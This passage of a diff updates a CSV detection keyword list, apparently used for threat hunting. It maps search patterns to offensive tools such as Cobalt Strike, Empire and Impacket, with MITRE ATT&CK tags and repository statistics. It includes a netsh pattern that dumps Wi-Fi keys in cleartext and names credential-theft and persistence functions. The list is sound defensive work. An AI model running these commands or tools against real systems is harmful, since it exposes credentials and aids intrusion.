Windows allows you to save your password in order to use it in each time that you connect the remote server. This utility recovers all network passwords stored on your system for the current logged-on user. It can also recover the passwords stored in Credentials file of external drive. as long as you know the last log-on password.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/network_password_recovery.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*netsh wlan show profile $wlan key=clear | Select-String *?<=Key Content\s+:\s*","offensive_tool_keyword","WLAN-Windows-Passwords","Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords","1","0","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*netsh wlan show profile $wlan key=clear | Select-String *?<=Key Content\s+:\s*","offensive_tool_keyword","WLAN-Windows-Passwords","Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" "*netsniff-ng*","offensive_tool_keyword","netsniff-ng","netsniff-ng is a high performance Linux network sniffer for packet inspection. It can be used for protocol analysis. reverse engineering or network debugging. The gain of performance is reached by 'zero-copy' mechanisms. 
so that the kernel does not need to copy packets from kernelspace to userspace.","T1040 - T1043 - T1052 - T1065 - T1096 - T1102 - T1113 - T1114 - T1123 - T1127 - T1136 - T1143 - T1190 - T1200 - T1201 - T1219 - T1222 - T1496 - T1497 - T1557 - T1560 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","N/A","N/A","Sniffing & Spoofing","https://packages.debian.org/fr/sid/netsniff-ng","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*netstat -tnlp || ss -tnlp*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2924","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" -"*netstat -unlp || ss -unlp*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2924","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*netstat -tnlp || ss -tnlp*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*netstat -unlp || ss -unlp*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege 
Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" "*nettitude/ETWHash*","offensive_tool_keyword","ETWHash","C# POC to extract NetNTLMv1/v2 hashes from ETW provider","T1556.001","TA0009 ","N/A","N/A","Credential Access","https://github.com/nettitude/ETWHash","1","1","N/A","N/A","3","229","27","2023-05-10T06:45:06Z","2023-04-26T15:53:01Z" "*nettitude/MalSCCM*","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tools","https://github.com/nettitude/MalSCCM","1","1","N/A","10","3","223","34","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z" -"*netuser_enum*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","964","172","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" -"*netview.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Sniffing & Spoofing","https://github.com/SecureAuthCorp/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*netview_enum*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","964","172","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" -"*network2john.lua*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*netuser_enum*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" +"*netview.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Sniffing & Spoofing","https://github.com/SecureAuthCorp/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*netview_enum*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" +"*network2john.lua*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential 
Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*NetworkMiner*","offensive_tool_keyword","NetworkMiner","A Network Forensic Analysis Tool (NFAT)","T1040 - T1043 - T1052 - T1065 - T1096 - T1102 - T1113 - T1114 - T1123 - T1127 - T1136 - T1143 - T1190 - T1200 - T1201 - T1219 - T1222 - T1496 - T1497 - T1557 - T1560 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","N/A","N/A","Sniffing & Spoofing","http://www.netresec.com/?page=NetworkMiner","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*new session to 127.0.0.1:3000*","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1043 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","0","N/A","N/A","3","285","60","2023-05-17T12:47:52Z","2017-12-19T18:10:35Z" "*NewAdminAccountCreation.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" -"*New-ElevatedPersistenceOption*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Persistence.psm1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*New-ElevatedPersistenceOption*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*New-HoneyHash*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","New-HoneyHash.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*New-HoneyHash.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1086","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*New-InMemoryModule -ModuleName Win32*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*New-InMemoryModule*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-BypassUACTokenManipulation.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*New-InMemoryModule*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*New-ElevatedPersistenceOption*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Persistence.psm1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*New-ElevatedPersistenceOption*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*New-HoneyHash*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","New-HoneyHash.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*New-HoneyHash.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1086","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*New-InMemoryModule -ModuleName Win32*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
